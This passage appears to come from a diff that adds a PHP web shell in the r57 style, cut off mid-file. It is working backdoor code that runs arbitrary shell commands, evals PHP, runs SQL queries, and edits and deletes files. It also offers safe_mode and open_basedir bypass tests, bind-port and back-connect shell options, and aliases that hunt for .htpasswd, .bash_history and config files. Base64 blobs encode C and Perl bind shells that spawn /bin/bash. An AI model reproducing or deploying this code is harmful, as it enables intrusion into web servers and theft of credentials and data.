<b>".$rowcount."</b></font></td></tr></table><br>";} + else { + echo "<table width=100%><tr>"; + for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;".htmlspecialchars(@ocicolumnname($stat, $j))."&nbsp;</b></font></td>"; } + echo "</tr>"; + while(ocifetch($stat)) + { + echo "<tr>"; + for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td><font face=Verdana size=-2>&nbsp;".htmlspecialchars(@ociresult($stat, $j))."&nbsp;</font></td>"; } + echo "</tr>"; + } + echo "</table><br>"; + } + @ocifreestatement($stat); + } + } + } + @ocilogoff($db); + } + break; + } + echo "<form name=form method=POST>"; + echo in('hidden','db',0,$_POST['db']); + echo in('hidden','db_port',0,$_POST['db_port']); + echo in('hidden','mysql_l',0,$_POST['mysql_l']); + echo in('hidden','mysql_p',0,$_POST['mysql_p']); + echo in('hidden','mysql_db',0,$_POST['mysql_db']); + echo in('hidden','cmd',0,'db_query'); + echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; + echo "</form>"; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); + } +if(isset($_GET['delete'])) + { + @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1)); + } +if(isset($_GET['tmp'])) + { + @unlink("/tmp/bdpl"); + @unlink("/tmp/back"); + @unlink("/tmp/bd"); + @unlink("/tmp/bd.c"); + @unlink("/tmp/dp"); + @unlink("/tmp/dpc"); + @unlink("/tmp/dpc.c"); + } +if(isset($_GET['phpini'])) +{ +echo $head; +function U_value($value) + { + if ($value == '') return '<i>no value</i>'; + if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; + if ($value === null) return 'NULL'; + if (@is_object($value)) $value = (array) $value; + if (@is_array($value)) + { + @ob_start(); + print_r($value); + $value = @ob_get_contents(); + @ob_end_clean(); + } + return U_wordwrap((string) $value); + } +function U_wordwrap($str) + { + $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true); + return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str); + } +if (@function_exists('ini_get_all')) + { + $r = ''; + echo '<table width=100%>', '<tr><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>'; + foreach (@ini_get_all() as $key=>$value) + { + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>'; + } + echo $r; + echo '</table>'; + } +echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; +die(); +} +if(isset($_GET['cpu'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>'; + $cpuf = @file("cpuinfo"); + if($cpuf) + { + $c = @sizeof($cpuf); + for($i=0;$i<$c;$i++) + { + $info = @explode(":",$cpuf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if(isset($_GET['mem'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>'; + $memf = @file("meminfo"); + if($memf) + { + $c = sizeof($memf); + for($i=0;$i<$c;$i++) + { + $info = explode(":",$memf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +/* +????? ????? +$language='ru' - ??????? +$language='eng' - ?????????? +*/ +$language='eng'; +$lang=array( +'ru_text1' =>'??????????? ???????', +'ru_text2' =>'?????????? ?????? ?? ???????', +'ru_text3' =>'????????? ???????', +'ru_text4' =>'??????? ??????????', +'ru_text5' =>'???????? ?????? ?? ??????', +'ru_text6' =>'????????? ????', +'ru_text7' =>'??????', +'ru_text8' =>'???????? ?????', +'ru_butt1' =>'?????????', +'ru_butt2' =>'?????????', +'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash', +'ru_text10'=>'??????? ????', +'ru_text11'=>'?????? ??? ???????', +'ru_butt3' =>'???????', +'ru_text12'=>'back-connect', +'ru_text13'=>'IP-?????', +'ru_text14'=>'????', +'ru_butt4' =>'?????????', +'ru_text15'=>'???????? ?????? ? ?????????? ???????', +'ru_text16'=>'????????????', +'ru_text17'=>'????????? ????', +'ru_text18'=>'????????? ????', +'ru_text19'=>'Exploits', +'ru_text20'=>'????????????', +'ru_text21'=>'????? ???', +'ru_text22'=>'datapipe', +'ru_text23'=>'????????? ????', +'ru_text24'=>'????????? ????', +'ru_text25'=>'????????? ????', +'ru_text26'=>'????????????', +'ru_butt5' =>'?????????', +'ru_text28'=>'?????? ? safe_mode', +'ru_text29'=>'?????? ????????', +'ru_butt6' =>'???????', +'ru_text30'=>'???????? ?????', +'ru_butt7' =>'???????', +'ru_text31'=>'???? ?? ??????', +'ru_text32'=>'?????????? PHP ????', +'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL', +'ru_butt8' =>'?????????', +'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include', +'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql', +'ru_text36'=>'????', +'ru_text37'=>'?????', +'ru_text38'=>'??????', +'ru_text39'=>'???????', +'ru_text40'=>'???? ??????? ???? ??????', +'ru_butt9' =>'????', +'ru_text41'=>'????????? ? ?????', +'ru_text42'=>'?????????????? ?????', +'ru_text43'=>'????????????? ????', +'ru_butt10'=>'?????????', +'ru_butt11'=>'?????????????', +'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!', +'ru_text45'=>'???? ????????', +'ru_text46'=>'???????? phpinfo()', +'ru_text47'=>'???????? ???????? php.ini', +'ru_text48'=>'???????? ????????? ??????', +'ru_text49'=>'???????? ??????? ? ???????', +'ru_text50'=>'?????????? ? ??????????', +'ru_text51'=>'?????????? ? ??????', +'ru_text52'=>'????? ??? ??????', +'ru_text53'=>'?????? ? ?????', +'ru_text54'=>'????? ?????? ? ??????', +'ru_butt12'=>'?????', +'ru_text55'=>'?????? ? ??????', +'ru_text56'=>'?????? ?? ???????', +'ru_text57'=>'???????/??????? ????/??????????', +'ru_text58'=>'???', +'ru_text59'=>'????', +'ru_text60'=>'??????????', +'ru_butt13'=>'???????/???????', +'ru_text61'=>'???? ??????', +'ru_text62'=>'?????????? ???????', +'ru_text63'=>'???? ??????', +'ru_text64'=>'?????????? ???????', +'ru_text65'=>'???????', +'ru_text66'=>'???????', +'ru_text67'=>'Chown/Chgrp/Chmod', +'ru_text68'=>'???????', +'ru_text69'=>'????????1', +'ru_text70'=>'????????2', +'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)", +'ru_text72'=>'????? ??? ??????', +'ru_text73'=>'?????? ? ?????', +'ru_text74'=>'?????? ? ??????', +'ru_text75'=>'* ????? ???????????? ?????????? ?????????', +'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find', +'ru_text77'=>'???????? ????????? ???? ??????', +'ru_text78'=>'?????????? ???????', +'ru_text79'=>'?????????? ???????', +'ru_text80'=>'???', +'ru_text81'=>'????', +'ru_text82'=>'???? ??????', +'ru_text83'=>'?????????? SQL ???????', +'ru_text84'=>'SQL ??????', +'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????', +/* --------------------------------------------------------------- */ +'eng_text1' =>'Sikat..!!', +'eng_text2' =>'Running..di server', +'eng_text3' =>'Jalankan perintah', +'eng_text4' =>'Direktori Skrg', +'eng_text5' =>'Upload files ke server', +'eng_text6' =>'Local file', +'eng_text7' =>'Aliases', +'eng_text8' =>'Select alias', +'eng_butt1' =>'Sikat', +'eng_butt2' =>'Upload', +'eng_text9' =>'Bind port to /bin/bash', +'eng_text10'=>'Port', +'eng_text11'=>'Password untuk', +'eng_butt3' =>'Bind', +'eng_text12'=>'back-connect', +'eng_text13'=>'IP', +'eng_text14'=>'Port', +'eng_butt4' =>'Connect', +'eng_text15'=>'Upload files from remote server', +'eng_text16'=>'With', +'eng_text17'=>'Remote file', +'eng_text18'=>'Local file', +'eng_text19'=>'Exploits', +'eng_text20'=>'Use', +'eng_text21'=>'&nbsp;New name', +'eng_text22'=>'datapipe', +'eng_text23'=>'Local port', +'eng_text24'=>'Remote host', +'eng_text25'=>'Remote port', +'eng_text26'=>'Use', +'eng_butt5' =>'Run', +'eng_text28'=>'Work in safe_mode', +'eng_text29'=>'ACCESS DENIED', +'eng_butt6' =>'Change', +'eng_text30'=>'Cat file', +'eng_butt7' =>'Show', +'eng_text31'=>'File not found', +'eng_text32'=>'Eval PHP code', +'eng_text33'=>'Test bypass open_basedir with cURL functions', +'eng_butt8' =>'Test', +'eng_text34'=>'Test bypass safe_mode with include function', +'eng_text35'=>'Test bypass safe_mode with load file in mysql', +'eng_text36'=>'Database', +'eng_text37'=>'Login', +'eng_text38'=>'Password', +'eng_text39'=>'Table', +'eng_text40'=>'Dump database table', +'eng_butt9' =>'Dump', +'eng_text41'=>'Save dump in file', +'eng_text42'=>'Edit files', +'eng_text43'=>'File for edit', +'eng_butt10'=>'Save', +'eng_text44'=>'Can\'t edit file! Only read access!', +'eng_text45'=>'File saved', +'eng_text46'=>'Show phpinfo()', +'eng_text47'=>'Show variables from php.ini', +'eng_text48'=>'Delete temp files', +'eng_butt11'=>'Edit file', +'eng_text49'=>'Delete script from server', +'eng_text50'=>'View cpu info', +'eng_text51'=>'View memory info', +'eng_text52'=>'Find text', +'eng_text53'=>'In dirs', +'eng_text54'=>'Find text in files', +'eng_butt12'=>'Find', +'eng_text55'=>'Only in files', +'eng_text56'=>'Nothing :(', +'eng_text57'=>'Create/Delete File/Dir', +'eng_text58'=>'name', +'eng_text59'=>'file', +'eng_text60'=>'dir', +'eng_butt13'=>'Create/Delete', +'eng_text61'=>'File created', +'eng_text62'=>'Dir created', +'eng_text63'=>'File deleted', +'eng_text64'=>'Dir deleted', +'eng_text65'=>'Create', +'eng_text66'=>'Delete', +'eng_text67'=>'Chown/Chgrp/Chmod', +'eng_text68'=>'Command', +'eng_text69'=>'param1', +'eng_text70'=>'param2', +'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", +'eng_text72'=>'Text for find', +'eng_text73'=>'Find in folder', +'eng_text74'=>'Find in files', +'eng_text75'=>'* you can use regexp', +'eng_text76'=>'Search text in files via find', +'eng_text77'=>'Show database structure', +'eng_text78'=>'show tables', +'eng_text79'=>'show columns', +'eng_text80'=>'Type', +'eng_text81'=>'Net', +'eng_text82'=>'Databases', +'eng_text83'=>'Run SQL query', +'eng_text84'=>'SQL query', +); +/* +?????? ?????? +????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? ) +?? ?????? ???? ????????? ??? ???????? ???????. +*/ +$aliases=array( +'find suid files'=>'find / -type f -perm -04000 -ls', +'find suid files in current dir'=>'find . -type f -perm -04000 -ls', +'find sgid files'=>'find / -type f -perm -02000 -ls', +'find sgid files in current dir'=>'find . -type f -perm -02000 -ls', +'find config.inc.php files'=>'find / -type f -name config.inc.php', +'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php', +'find config* files'=>'find / -type f -name "config*"', +'find config* files in current dir'=>'find . -type f -name "config*"', +'find all writable files'=>'find / -type f -perm -2 -ls', +'find all writable files in current dir'=>'find . -type f -perm -2 -ls', +'find all writable directories'=>'find / -type d -perm -2 -ls', +'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', +'find all writable directories and files'=>'find / -perm -2 -ls', +'find all writable directories and files in current dir'=>'find . -perm -2 -ls', +'find all service.pwd files'=>'find / -type f -name service.pwd', +'find service.pwd files in current dir'=>'find . -type f -name service.pwd', +'find all .htpasswd files'=>'find / -type f -name .htpasswd', +'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd', +'find all .bash_history files'=>'find / -type f -name .bash_history', +'find .bash_history files in current dir'=>'find . -type f -name .bash_history', +'find all .mysql_history files'=>'find / -type f -name .mysql_history', +'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history', +'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc', +'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc', +'list file attributes on a Linux second extended file system'=>'lsattr -va', +'show opened ports'=>'netstat -an | grep -i listen', +'----------------------------------------------------------------------------------------------------'=>'ls -la' +); +$table_up1 = "<tr><td bgcolor=#333333><font face=Verdana size=-2><b><div align=center>:: "; +$table_up2 = " ::</div></b></font></td></tr><tr><td>"; +$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333>"; +$table_end1 = "</td></tr>"; +$arrow = " <font face=Wingdings color=gray>?</font>"; +$lb = "<font color=black>[</font>"; +$rb = "<font color=black>]</font>"; +$font = "<font face=Verdana size=-2>"; +$ts = "<table class=table1 width=100% align=center>"; +$te = "</table>"; +$fs = "<form name=form method=POST>"; +$fe = "</form>"; + +if (!empty($_POST['dir'])) { @chdir($_POST['dir']); } +$dir = @getcwd(); +$windows = 0; +$unix = 0; +if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1; +if(empty($dir)) + { + $os = getenv('OS'); + if(empty($os)){ $os = php_uname(); } + if(empty($os)){ $os ="-"; $unix=1; } + else + { + if(@eregi("^win",$os)) { $windows = 1; } + else { $unix = 1; } + } + } +if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") + { + echo $head; + if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } + else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); } + $sr->SearchText(0,0); + $res = $sr->GetResultFiles(); + $found = $sr->GetMatchesCount(); + $titles = $sr->GetTitles(); + $r = ""; + if($found > 0) + { + $r .= "<TABLE width=100%>"; + foreach($res as $file=>$v) + { + $r .= "<TR>"; + $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3); + $r .= ($windows)? str_replace("/","\\",$file) : $file; + $r .= "</b></font></ TD>"; + $r .= "</TR>"; + foreach($v as $a=>$b) + { + $r .= "<TR>"; + $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>"; + $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>"; + $r .= "</TR>\n"; + } + } + $r .= "</TABLE>"; + echo $r; + } + else + { + echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>"; + } + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if($windows&&!$safe_mode) + { + $uname = ex("ver"); + if(empty($uname)) { $safe_mode = 1; } + } +else if($unix&&!$safe_mode) + { + $uname = ex("uname"); + if(empty($uname)) { $safe_mode = 1; } + } +$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); +if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; } +function ws($i) +{ +return @str_repeat("&nbsp;",$i); +} +function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; +} +function we($i) +{ +if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ???????? ? ???? '; } +else { $text = "[-] ERROR! Can't write in file "; } +echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function re($i) +{ +if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ????????? ???? '; } +else { $text = "[-] ERROR! Can't read file "; } +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function ce($i) +{ +if($GLOBALS['language']=="ru"){ $text = "?? ??????? ??????? "; } +else { $text = "Can't create "; } +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function perms($mode) +{ +if ($GLOBALS['windows']) return 0; +if( $mode & 0x1000 ) { $type='p'; } +else if( $mode & 0x2000 ) { $type='c'; } +else if( $mode & 0x4000 ) { $type='d'; } +else if( $mode & 0x6000 ) { $type='b'; } +else if( $mode & 0x8000 ) { $type='-'; } +else if( $mode & 0xA000 ) { $type='l'; } +else if( $mode & 0xC000 ) { $type='s'; } +else $type='u'; +$owner["read"] = ($mode & 00400) ? 'r' : '-'; +$owner["write"] = ($mode & 00200) ? 'w' : '-'; +$owner["execute"] = ($mode & 00100) ? 'x' : '-'; +$group["read"] = ($mode & 00040) ? 'r' : '-'; +$group["write"] = ($mode & 00020) ? 'w' : '-'; +$group["execute"] = ($mode & 00010) ? 'x' : '-'; +$world["read"] = ($mode & 00004) ? 'r' : '-'; +$world["write"] = ($mode & 00002) ? 'w' : '-'; +$world["execute"] = ($mode & 00001) ? 'x' : '-'; +if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; +if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; +if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; +$s=sprintf("%1s", $type); +$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); +$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); +$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); +return trim($s); +} +function in($type,$name,$size,$value) +{ + $ret = "<input type=".$type." name=".$name." "; + if($size != 0) { $ret .= "size=".$size." "; } + $ret .= "value=\"".$value."\">"; + return $ret; +} +function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or we($fname); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} +function sr($l,$t1,$t2) + { + return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>"; + } +if (!@function_exists("view_size")) +{ +function view_size($size) +{ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} +} +function DirFiles($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (FALSE !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(!is_dir($dir."/".$file)) + { + if($types) + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if(@in_array($ext,@explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + function DirFilesWide($dir) + { + $files = Array(); + $dirs = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + { + $file = @strtoupper($file); + $dirs[$file] = '&lt;DIR&gt;'; + } + else + $files[$file] = @filesize($dir."/".$file); + } + } + @closedir($handle); + @ksort($dirs); + @ksort($files); + $files = @array_merge($dirs,$files); + } + return $files; + } + function DirFilesR($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if($types) + { + if(@in_array($ext,explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + function DirPrintHTMLHeaders($dir) + { + $pockets = ''; + $handle = @opendir($dir) or die("Can't open directory $dir"); + echo " <ul style='margin-left: 0px; padding-left: 20px;'>\n"; + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + { + echo " <li><b>[ $file ]</b></li>\n"; + DirPrintHTMLHeaders($dir."/".$file); + } + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if(@in_array($ext,array('.htm','.html'))) + { + $header = '-=None=-'; + $strings = @file($dir."/".$file) or die("Can't open file ".$dir."/".$file); + for($a=0;$a<count($strings);$a++) + { + $pattern = '(<title>(.+)</title>)'; + if(@eregi($pattern,$strings[$a],$pockets)) + { + $header = "&laquo;".$pockets[2]."&raquo;"; + break; + } + } + echo " <li>".$header."</li>\n"; + } + } + } + } + echo " </ul>\n"; + @closedir($handle); + } + + class SearchResult + { + var $text; + var $FilesToSearch; + var $ResultFiles; + var $FilesTotal; + var $MatchesCount; + var $FileMatschesCount; + var $TimeStart; + var $TimeTotal; + var $titles; + function SearchResult($dir,$text,$filter='') + { + $dirs = @explode(";",$dir); + $this->FilesToSearch = Array(); + for($a=0;$a<count($dirs);$a++) + $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); + $this->text = $text; + $this->FilesTotal = @count($this->FilesToSearch); + $this->TimeStart = getmicrotime(); + $this->MatchesCount = 0; + $this->ResultFiles = Array(); + $this->FileMatchesCount = Array(); + $this->titles = Array(); + } + function GetFilesTotal() { return $this->FilesTotal; } + function GetTitles() { return $this->titles; } + function GetTimeTotal() { return $this->TimeTotal; } + function GetMatchesCount() { return $this->MatchesCount; } + function GetFileMatchesCount() { return $this->FileMatchesCount; } + function GetResultFiles() { return $this->ResultFiles; } + function SearchText($phrase=0,$case=0) { + $qq = @explode(' ',$this->text); + $delim = '|'; + if($phrase) + foreach($qq as $k=>$v) + $qq[$k] = '\b'.$v.'\b'; + $words = '('.@implode($delim,$qq).')'; + $pattern = "/".$words."/"; + if(!$case) + $pattern .= 'i'; + foreach($this->FilesToSearch as $k=>$filename) + { + $this->FileMatchesCount[$filename] = 0; + $FileStrings = @file($filename) or @next; + for($a=0;$a<@count($FileStrings);$a++) + { + $count = 0; + $CurString = $FileStrings[$a]; + $CurString = @Trim($CurString); + $CurString = @strip_tags($CurString); + $aa = ''; + if(($count = @preg_match_all($pattern,$CurString,$aa))) + { + $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString); + $this->ResultFiles[$filename][$a+1] = $CurString; + $this->MatchesCount += $count; + $this->FileMatchesCount[$filename] += $count; + } + } + } + $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); + } + } + function getmicrotime() + { + list($usec,$sec) = @explode(" ",@microtime()); + return ((float)$usec + (float)$sec); + } +$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS +A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I +GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt +b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 +pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF +NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK +ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog +ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk +7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 +9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld +2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu +dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp +lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; +$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS +VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs +JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV +TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG +lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK +Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i 